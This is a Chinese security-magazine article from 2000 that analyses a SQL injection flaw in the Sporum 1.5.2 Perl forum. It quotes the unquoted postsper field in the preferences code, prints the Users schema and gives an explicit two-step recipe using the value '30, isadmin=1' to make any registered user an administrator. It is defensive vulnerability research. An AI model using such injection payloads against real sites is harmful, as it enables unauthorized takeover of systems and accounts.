首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第8期->技术专题
作者:stardust
出处:bugmail@telekbird.com.cn
日期:2000-04-12
Perl cgi和SQL漏洞分析一例
---- 如何成为Sporum论坛的管理员
by stardust
前几天在网上瞎逛,撞进了一个介绍Linux的站点,站点本身制作平平,但它有一个看起来还不错的论坛.页面的底部提供了一个叫"Powered by Sporum1.5.2"的链接,指向论坛程序的官方主页.从那里我知道了Sporum是用Perl写的,以MySQL为后台数据库,注册用户可以在论坛发贴子,允许用户订制自己的偏好,并以cookies进行身份验证.这个使我不由得想到了wwwthreads这个著名的论坛程序,从架构和功能上Sporum都和它很相似.而在此不久之前,wwwthreads已被发现有安全漏洞,可以使任何普通用户成为论坛的管理员.这使著名的安全资源站点packetstorm遭了殃,导致它使用了wwwthreads的论坛被人劫持.想了解更多的细节,你可以读一下:
http://packetstorm.securify.com/0002-exploits/rfp2k01.txt
在这里rfp描述了他如何hack了论坛以及对基于WEB的数据库系统的分析,很有启发性,值得一读.rfp在他的文章里指出wwwthreads的安全漏洞在于没有对从表单来的用户输入进行全面的检查.既然Sporum那么象wwwthreads,会不会也存在相似的问题呢?
好,那么让我们来看看吧,从linuxberg很容易地可以得到Sporum的1.5.2版.和wwwthreads一样,Sporum允许用户订制自己的偏好你可以订制贴子如何显示,如何排列.wwwthreads正是死在这,那么Sporum呢?在User.pm的可以找到相关的程序片断:
sub save_preferences1{
my ($self, $STATE) = @_;
my ($STATE, $spdb) = map{ $self->{$_} } qw(STATE spdb);
my $DBH = $spdb->{'dbh'};
my ($postsper, $myuid, $uid, $prev_op) =
map{ $STATE->{$_} } qw(mypostsper myuid uid prev_op);
# --- check the uid --- thanks Tim W from solutionscripts.com
# --- if uid ne myuid
if($uid != $myuid){
# --- need admin right to change the profile
my ($isadmin) = $spdb->db_select_cols("isadmin", "Users", "uid=$uid");
if(!$isadmin){
return (0, $lang->{'not_allow_edit'}, "", "$config->{'cgidir'}/user.cgi");
}
}
my ($sigq, $sortq, $displayq, $viewq, $cookieexpireq) =
map{ $DBH->quote($STATE->{$_}) } <------ 在用户输入的数据外面套上' '
qw(mysig mysort mydisplay myview cookieexpire);
my $data = {('sig'=>$sigq,
'sort'=>$sortq, 'display'=>$displayq,
'view'=>$viewq, 'postsper'=>$postsper, <------看这,是不是有点特别
'cookieexpire'=>$cookieexpireq)};
my ($succ, $errmsg) = $spdb->db_update("Users", $data, "uid=$myuid");
my $uri = "$config->{'cgidir'}/user.cgi";
if($prev_op eq "modifyuser"){
$uri = "$config->{'cgidir'}/admin.cgi";
}
return (0, $errmsg) if !$succ;
return (1, $lang->{'profile_modified2'}, $lang->{'profile_modified1'}, $uri);
}
哈哈,果然不出所料,看出问题出在那了吗?程序会根据你的输入更新数据库,更新的字段有sig,sort,view,display,cookieexpire和postsper,其中前五个字段在数据库中是字符型的,虽然程序没对其做什么检查,但它会在它们外面套上' ',这样用户的输入将不会影响到后来的数据库更新操作.可是postper字段不同,它是数值型的,程序忘记给它穿外套了,看起来我们机会来了.
$spdb->db_update("Users", $data, "uid=$myuid");
这个语句的功能是其实就是,根据提供给它的参数生成一个MySQL的Update命令然后交给MySQL去执行.假如我们提交给表单的数据是这样的:
sort="date desc",theme=NULL,view="collapsed",sig="",display="threaded", cookieexpire="+1d",uid=1246,postsper=30
那么转换出来的Update语句会是这样的:
UPDATE Users SET postsper=30, sort='date desc', theme=NULL, view='collapsed', sig='', display='threaded', cookieexpire='+1d' WHERE uid=1246
我们看到postsper=30没有套上' '外套.这是正常的情况,没什么害处.但是如果postsper的值是这样的呢:"30, somecols=newvalue",那么转换出来的Update语句就变成了:
UPDATE Users SET postsper=30, somecols=newvalue, sort='date desc', theme=NULL,
~~~~~~~~~~~~~~~~~~~~~\
我们的输入
view='collapsed', sig='', display='threaded', cookieexpire='+1d' WHERE uid=1246
这将允许我们修改uid=1246这个用户的任意字段!其实利用postsper,我们可以修改任意用户的任意字段.假设一下postsper="30,somecol=newvalue where uid=other's_id #",那么相应的Update语句就是这样的:
UPDATE Users SET postsper=30,somecol=newvalue where uid=other's_id #, sort='date desc',
theme=NULL, view='collapsed', sig='', display='threaded', cookieexpire='+1d'
WHERE uid=1246
因为MySQL将#后的内容作为注释忽略掉,实际执行的是#以前的部分.这样我们其实可以修改Users表中的任意字段.好了,说了这么多,到底修改哪个字段,能使我们成为管理员呢?看一下Users表的结构就知道了:
CREATE TABLE Users(
uid INT(11) NOT NULL, # --- user id
username CHAR(30) NOT NULL, # --- username
passwd CHAR(50) NOT NULL, # --- password
nickname CHAR(50) NOT NULL, # --- nickname
realname CHAR(50), # --- real name
realemail CHAR(50), # --- real email
fakeemail CHAR(50), # --- fake email
homepage CHAR(100), # --- homepage
bio TEXT, # --- bio
sig TEXT, # --- sig
icq VARCHAR(50), # --- icq
sort VARCHAR(20)
DEFAULT "date desc", # --- sort
display CHAR(11)
DEFAULT "threaded", # --- display mode
view CHAR(10)
DEFAULT "collapsed", # --- view mode
postsper INT(11) DEFAULT 10, # --- posts per page
lastlogon DATETIME NOT NULL, # --- last logon
active INT(1) NOT NULL # --- status - 0, 1, 2
DEFAULT 0,
peek INT(11) UNSIGNED NOT NULL,# --- hits on the user profile
registered DATETIME NOT NULL, # --- registered on
cookieexpire CHAR(5) NOT NULL # --- login cookie expire
DEFAULT '+1d',
isadmin INT(1) NOT NULL # --- is user a admin? <------在这儿呢
DEFAULT 0,
# --- 8/27/99
location VARCHAR(150), # --- user location
photourl VARCHAR(150), # --- location of photo
privlev INT(1) NOT NULL, # --- privacy level
# --- 8/30/99
theme VARCHAR(100) NOT NULL # --- theme
DEFAULT "default",
# --- 9/12/99
lastresp DATETIME NOT NULL, # --- last response
PRIMARY KEY (uid, username),
INDEX index1 (uid),
INDEX index2 (username)
);
把postsper的值设成"30, isadmin=1",程序就会把我们更新成管理员了,是不是很不错?
简单总结一下如何成为Sporum论坛的管理员:
1. 注册一个普通用户
2. 登录后进入修改个人偏好表单,在postsper输入框中填入"30, isadmin=1",按"save".
你就成为管理员了.
结论:开发cgi程序一定要全面地检查用户的输入,不要想当然的认为用户会输入合法的数据给你,不这样做,是拿安全在冒险.
<完>
版权所有,未经许可,不得转载